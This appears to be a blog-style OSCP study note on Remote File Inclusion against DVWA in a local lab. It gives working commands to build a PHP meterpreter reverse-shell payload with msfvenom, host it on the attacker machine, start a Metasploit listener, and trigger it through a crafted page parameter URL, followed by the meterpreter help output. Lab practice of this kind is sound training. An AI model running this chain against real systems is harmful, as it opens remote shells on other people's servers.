OSCP Learning Notes - WebApp Exploitation(5)
Remote File Inclusion[RFI]
Prepare:
Download the DVWA from the following website and deploy it on your server.
Install XAMPP and DVWA:
1. Install XAMPP on Windows server. And change the Apache http port to 82 and ssl port to 4433.

2.Unzip the DVWA files to C:\xampp\htdocs.

3. Modify some configurations and browse the the DVWA website. The click the "Create/Reset Database" buttion.

4. Login the DVWA using admin/passsord.

5.Set the DVWA Security to Low and submit.

6. Go the File Inclusion page.

7. On Kali Linux, down load the file php-reverse-shell.php from the following website. And copy the file to /var/www/html.
http://pentestmonkey.net/tools/web-shells/php-reverse-shell

8.Change the ip and port and save it.

9.On the folder /var/www/html, create the exploit.php using the following commands.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.109 LPORT=4444 >> expoit.php

10. Start the http server in the folder /var/www/html on Kali Linux.
python3 -m http.server 80

11. Start the metasploit tool , then set the LHOST, LPORT and payload moudle. Expolit finanlly.
msfconsole set LHOST 10.0.0.109 set LPORT 4444 set payload php/meterpreter/reverse_tcp
exploit

12.Browse the following url throuth Firefox.
http://10.0.0.212:82/dvwa/vulnerabilities/fi/?page=http://10.0.0.109/exploit.php

Exploit the target server sucessfully.

13. Perform shell command to find usefull information.

Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background bgkill Kills a background meterpreter script bglist Lists running background scripts bgrun Executes a meterpreter script as a background thread channel Displays information or control active channels close Closes a channel disable_unicode_encoding Disables encoding of unicode strings enable_unicode_encoding Enables encoding of unicode strings exit Terminate the meterpreter session get_timeouts Get the current session timeout values guid Get the session GUID help Help menu info Displays information about a Post module irb Open an interactive Ruby shell on the current session load Load one or more meterpreter extensions machine_id Get the MSF ID of the machine attached to the session migrate Migrate the server to another process pivot Manage pivot listeners pry Open the Pry debugger on the current session quit Terminate the meterpreter session read Reads data from a channel resource Run the commands stored in a file run Executes a meterpreter script or Post module secure (Re)Negotiate TLV packet encryption on the session sessions Quickly switch to another session set_timeouts Set the current session timeout values sleep Force Meterpreter to go quiet, then re-establish session. transport Change the current transport mechanism use Deprecated alias for "load" uuid Get the UUID for the current session write Writes data to a channel Stdapi: File system Commands ============================ Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory Stdapi: Networking Commands =========================== Command Description ------- ----------- portfwd Forward a local port to a remote service Stdapi: System Commands ======================= Command Description ------- ----------- execute Execute a command getenv Get one or more environment variable values getpid Get the current process identifier getuid Get the user that the server is running as kill Terminate a process localtime Displays the target system's local date and time pgrep Filter processes by name pkill Terminate processes by name ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS Stdapi: Audio Output Commands ============================= Command Description ------- ----------- play play an audio file on target system, nothing written on disk
 
                     
                    
                 
                    
                
 
                
            
         
         浙公网安备 33010602011771号
浙公网安备 33010602011771号